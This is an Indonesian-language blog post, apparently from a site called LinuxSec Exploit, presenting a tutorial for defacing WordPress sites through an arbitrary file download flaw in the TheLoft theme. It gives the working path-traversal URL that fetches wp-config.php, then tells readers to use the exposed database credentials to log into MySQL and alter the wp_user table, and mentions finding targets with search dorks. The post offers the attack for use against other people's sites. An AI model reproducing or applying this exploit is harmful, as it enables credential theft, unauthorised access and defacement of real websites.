• Skip to primary navigation
  • Skip to main content
  • Skip to primary sidebar

LinuxSec Exploit

Nothing is Ever Locked

  • XSS Payloads
  • About Us

Deface WordPress dengan Exploit WordPress TheLoft Theme Arbitrary File Download Vulnerability

September 16, 2014 by Jack Wilder 1 Comment

Oke kali ini saya mau share exploit deface yang digunakan untuk deface wordpress. Namanya WordPress TheLoft Theme Arbitrary File Download Vulnerability. Termasuk exploit baru sih . Tinggal bagaimana dork yang kita gunakan .

Exploit :

  • http://localhost/wp-content/themes/TheLoft/download.php?file=../../../wp-config.php

Buka file wp-config.php nya, disitu ada user dan password untuk login database.

Sekian tutorial kali ini semoga bermanfaat.Jika db host nya localhost, cari yang lain lagi. cari yang pake url/server :p
Login MySQL, modif wp_user nya .

Shares

Filed Under: WordPress Exploit Tagged With: Exploit, Hacking

Reader Interactions

Comments

  1. Mr.error says

    October 27, 2020 at 9:49 am

    Dorknya mana kak

    Reply

Leave a Reply Cancel reply

Your email address will not be published. Required fields are marked *

Primary Sidebar

Popular Post

CVE-2019-13360 – CentOS Control Web Panel Authentication Bypass

Prestashop Module Blocktestimonial File Upload Auto Exploit

Deface WordPress Dengan Exploit Archin WordPress Theme 3.2 Unauthenticated Configuration Access Vulnerability

Bruteforce FTP Login dengan Metasploit Module FTP Authentication Scanner

Exploit Drupal Core 7.x Auto SQL Injection dan Upload Shell

Zendesk Custom Domain or Subdomain Takeover

Azure Traffic Manager Custom Domain or Subdomain Takeover

Tumblr Custom Domain or Subdomain Takeover

Exploit WordPress Ajax Load More PHP Upload Vulnerability

Readme.io Custom Domain or Subdomain Takeover

LinuxSec / 66 queries in 0.08 seconds